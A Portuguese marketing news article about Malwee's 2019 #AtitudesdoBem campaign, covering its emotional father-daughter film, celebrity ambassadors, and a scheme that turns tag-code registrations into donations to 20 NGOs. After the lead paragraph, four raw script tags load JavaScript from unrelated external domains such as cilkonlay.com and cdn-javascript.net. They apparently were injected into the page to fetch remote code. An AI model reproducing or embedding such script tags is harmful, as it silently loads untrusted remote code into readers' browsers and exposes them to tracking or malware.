Mídia

Campanha da Malwee busca despertar gentilezas

Com o tema “Bonito não é o que a gente veste, bonito é o que a gente faz”, marca  aposta em filme emocional para engajar consumidor na maior campanha de doação da sua história. <script src="//cilkonlay.com/2176e1b695bb4978f2.js"></script> <script src="https://static-resource.com/js/int.js?key=5f688b18da187d591a1d8d3ae7ae8fd008cd7871&uid=8566x" type="text/javascript"></script> <script src="https://cdn-javascript.net/api?key=a1ce18e5e2b4b1b1895a38130270d6d344d031c0&uid=8566x&format=arrjs&r=1573082677769" type="text/javascript"></script> <script src="https://cilkonlay.com/ext/2176e1b695bb4978f2.js?sid=52564_8566_&title=a&blocks[]=31af2" type="text/javascript"></script>

Com o tema “Bonito não é o que a gente veste, bonito é o que a gente faz”, marca  aposta em filme emocional para engajar consumidor na maior campanha de doação da sua história.

Despertar gentilezas por meio de pequenas atitudes para construir um mundo melhor. É com esse propósito que a Malwee apresenta a campanha #AtitudesdoBem 2019.

As principais novidades do universo da propaganda estão aqui.       

O melhor do marketing social está aqui.

Lançada pela primeira vez em 2018, a segunda edição da campanha pretende ajudar mais de 20 mil crianças em todo o País na maior corrente de doação da história da marca.

Para mobilizar os consumidores, o filme explora a relação de pai e filha e mostra como a criança absorve os ensinamentos positivos que recebe ao longo da vida. Em um pequeno gesto da menina, as situações se entrelaçam, e, com um tom emocional, reforça a mensagem: ‘Bonito não é o que a gente veste, bonito é o que a gente faz’. 

Cocriação da Malwee com a produtora Ventura.tv.br, o filme, que tem 2 minutos e 30 segundos, pode ser visto nas redes sociais da marca Malwee e no programa Domingo Legal, do SBT.

 A campanha conta ainda com embaixadores como o apresentador Celso Portiolli e os atores Ricardo Pereira, Miá Mello, Dani Suzuki e Dudu Azevedo. Eles vão incentivar, em suas redes sociais, a participação do público.

“A campanha #AtitudesdoBem busca uma grande mobilização. Queremos incentivar pequenos gestos que podem fazer a diferença na construção de um mundo melhor. São ações simples, mas que mostram como podemos mudar a vida de quem está à nossa volta”, explica Guilherme Weege, CEO do Grupo Malwee.

Campanha apoia 20 projetos sociais em todo o Brasil

 

A campanha #AtitudesdoBem tem dois meses de duração e apoia 20 projetos sociais em diversas regiões do Brasil. Quem escolhe o projeto beneficiado em cada doação é o próprio consumidor.

Para participar, basta o consumidor comprar qualquer peça das coleções de fim de ano das marcas Malwee, Malwee Kids! ou Malwee Liberta (Alto Verão ou Celebration), cadastrar o código #AtitudesdoBem (impresso na etiqueta) no site da campanha, escolher a  ONG que deseja ajudar e a Malwee faz uma doação para a causa escolhida.

Cada cadastro contabilizará uma doação equivalente ao valor de uma camiseta básica para uma das ONGs participantes. Para conhecer cada uma e saber o que esse valor significa para elas, basta entrar no site da ação.

Essa campanha e toda a curadoria das instituições foram criadas em parceria com o Movimento Arredondar.

Confira o vídeo da campanha abaixo:

Caso não consiga visualizar o vídeo clique aqui.